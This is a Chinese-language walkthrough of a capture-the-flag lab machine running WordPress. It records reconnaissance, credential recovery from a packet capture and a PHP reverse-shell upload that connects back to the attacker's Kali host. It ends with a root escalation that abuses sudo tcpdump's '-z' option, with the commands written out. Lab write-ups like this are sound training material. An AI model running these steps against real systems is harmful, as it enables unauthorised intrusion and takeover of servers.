靶机设置

设置靶机为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机ip为192.168.112.137

目录扫描

开放80端口，进行目录扫描

dirb 192.168.112.137

访问浏览器

目录拼接

拼接/ipdata

发现了一个流量包

在wireshark里面查看，发现wordpress的账户密码

账号：webdeveloper

密码：Te5eQg&4sBS!Yr$)wf%(DcAd

拼接/wp-login.php

发现后台，进行登陆

登陆成功

getshell

发现可以文件上传的地方

使用kali反弹shell

cd /usr/share/webshells/php

ls

mv php-reverse-shell.php /home/kali/Desktop

vim php-reverse-shell.php

改成kali的ip进行监听

提交文件

发现上传的文件在wp-content/uploads/目录下

kali监听后点击

getshell成功

ssh登陆

sudo -l查看发现没有免密操作

shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

进入交互式shell

cd /var/www/html/ ，查看 wp-config.php 文件

发现了数据库的账号密码

账号：webdeveloper

密码：MasterOfTheUniverse

进行ssh登陆

ssh webdeveloper@192.168.112.137

登陆成功

提权

sudo -l查看免密操作

发现tcpdump操作可以执行

find / -name php-reverse-shell.php 2>/dev/null

COMMAND='php /var/www/html/wp-content/uploads/2028/08/php-reverse-shell.php'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

提权成功